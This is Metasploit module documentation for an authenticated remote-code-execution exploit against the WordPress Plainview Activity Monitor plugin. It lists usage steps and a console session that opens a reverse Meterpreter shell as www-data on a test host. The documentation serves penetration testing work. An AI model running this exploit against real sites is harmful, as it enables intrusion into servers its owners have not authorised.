## Description

  This module uses administrative functionality available in WordPress
  when the Plainview Activity Monitor plugin is installed to
  gain a shell with web server user permissions.

## Vulnerable Software

  This module has been tested successfully on WordPress 4.6
  with Plainview Activity Monitor version 20161228 installed.

  Software:

  * https://wordpress.org/plugins/plainview-activity-monitor/
  * https://wordpress.org/download/releases/

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/unix/webapp/wp_plainview_activity_monitor_rce`
  3. Do: `set rhosts <IP or domain_name>`
  4. Do: `set username <username>`
  5. Do: `set password <password>`
  6. Do: `set vhost <domain_name>`
  7. Do: `run`
  8. You should get a new session

## Options

  **TARGETURI**

  The base path to WordPress (default: `/`)

  **USERNAME**

  The username for WordPress

  **PASSWORD**

  The password for WordPress


## Scenarios

 ```
  msf5 > use exploit/unix/webapp/wp_plainview_activity_monitor_rce 
  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set rhosts wordpress.test.local
  rhosts => wordpress.test.local
  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set username admin
  username => admin
  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set password 123456
  password => 123456
  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > set vhost wordpress.test.local
  vhost => wordpress.test.local
  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > show targets

  Exploit targets:

     Id  Name
     --  ----
     0   WordPress


  msf5 exploit(unix/webapp/wp_plainview_activity_monitor_rce) > exploit

  [*] Started reverse TCP handler on 10.0.0.2:4444 
  [*] Trying to login...
  [+] Login Successful
  [*] Sending stage (38288 bytes) to 10.0.0.3
  [*] Meterpreter session 1 opened (10.0.0.2:4444 -> 10.0.0.3:51990) at 2019-11-10 08:24:11 +0100

  meterpreter > getuid
  Server username: www-data (33)
  meterpreter > 
 ```
